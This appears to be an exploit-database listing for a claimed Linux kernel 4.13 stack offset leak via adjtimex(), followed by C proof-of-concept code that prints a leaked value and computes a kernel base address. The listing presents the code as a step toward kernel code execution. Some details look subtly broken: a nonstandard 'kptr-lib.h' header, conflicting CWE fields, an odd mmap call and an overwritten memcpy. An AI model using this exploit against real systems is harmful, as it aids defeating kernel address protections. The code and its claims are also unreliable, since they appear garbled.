Linux Kernel Stack Offset Leak Vulnerability

vendor:

Linux Kernel

by:

Kptr-lib

7.8

CVSS

HIGH

Stack Offset Leak

119

CWE

Product Name: Linux Kernel

Affected Version From: 4.13.0-16-generic

Affected Version To: 4.13.0-16-generic

Patch Exists: Yes

Related CWE: N/A

CPE: o:linux:linux_kernel

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Linux

2018

Linux Kernel Stack Offset Leak Vulnerability

This exploit is related to a vulnerability in the Linux kernel which allows an attacker to leak the kernel stack offset. This vulnerability is caused by a lack of proper validation of user-supplied input when setting the timex structure in the adjtimex() system call. By setting the timex.modes field to 0x8000, an attacker can cause the kernel to leak the kernel stack offset in the timex.tai field. This can be used to calculate the kernel base address, which can then be used to gain arbitrary code execution in the kernel.

Mitigation:

The best way to mitigate this vulnerability is to apply the latest security patches from the vendor.

Source

Exploit-DB raw data:

#define _GNU_SOURCE
#define _BSD_SOURCE
#include <sys/timex.h>
#include <stdio.h>
#include <stdint.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/ipc.h>
#include <sys/sem.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <sys/syscall.h>
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>
#include <kptr-lib.h>

// Ubuntu 4.13.0-16-generic
// gcc -o poc poc.c -m32

struct timex time;

int main(int argc, char **argv)
{
	int r;
	unsigned long long stack_offset, kernel_base;
	unsigned int leak_value;
	unsigned int high = 0xffffffff;
	
	memset(&time, 0, sizeof(time));
	time.modes = 0x8000;

	mmap(0,0xa000,3,2022,-1,0);

	adjtimex(&time);    
	leak_value = time.tai;
	printf("--> leak_value : %x\n", leak_value);
	
	memcpy(&kernel_base, &leak_value, 4);
	memcpy((char *)&kernel_base + 4, &high, 4);
	stack_offset = 0x1fc4a4;
	kernel_base = leak_value - stack_offset;
	printf("--> kernel_stack_base : %llx\n", kernel_base);

 	return 0;
}